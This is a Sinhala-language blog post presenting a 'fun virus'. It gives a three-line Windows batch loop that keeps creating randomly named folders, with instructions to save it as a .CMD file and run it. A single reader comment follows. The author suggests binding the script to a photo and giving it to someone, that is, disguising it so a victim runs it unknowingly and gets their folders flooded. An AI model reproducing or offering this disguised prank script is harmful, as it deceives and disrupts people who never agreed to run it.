Folder 30000ක් හදමු



  Fun Virus හදමු  

ඔන්න මම අද පොඩි Virus එකක් හදන විදිහ කියලා දෙන්න තමයි හදන්නේ. මේක Virus එකක්මත් නෙමෙයි. පොඩි ආතල් එකක් ගන්න පුළුවන් වැඩක්.

මේ Virus එකෙන් කරන්නේ මේ Code එක තියන තැන New Folder 30000+ (මම නම් එච්චර හදලා බැලුවේ නෑ. 10000ක් විතර මගේ හැදුවා.) හදනවා. පට්ට නේ. මේක Photo එකකට වගේ Bind කරලා දුන්නම පට්ට නේ.

හරි දැන් කියෙව්වා ඇතිනේ. වැඩේ පටන් ගමු නේද?

හරි දැන් මම පල්ලෙහා දාලා තියන Code එක Copy කරගෙන Notepad එකට paste කරන්න.


:a
MKDIR %RANDOM%
Goto a

හරි දැන් මේක Notepad එකට paste කරගත්තනේ. දැන් මේක ඔයා කැමති තැනක Save කරගන්න. Save කරගද්දි නමේ අගට .CMD දාලා Save කරගන්න (Run.cmd). දැන් මේක Run කරලා බලන්න. එතන New Folder 30000ක් විතර හැදුවනම් හරි.

මේක Desktop එකේ Save කරලා Run වුනාම වෙන දේ තමයි මේ පල්ලෙහා තියන Photo එකේ තියෙන්නේ.


පෝස්ට් එක හොදයි නම් Comment එකක් දාගෙනම යන්න.

Previous
Next Post »

3 comments (අදහස්)

Click here for comments (අදහස්)
Unknown
admin
July 7, 2016 at 3:42 PM ×

අපිට කැමති folders.ගානක් ගහන්න පුලුවන්ද?

Reply
avatar


බැලුවද?

Comment එකකුත් දාගෙනම යමු නේ.....
ConversionConversion EmoticonEmoticon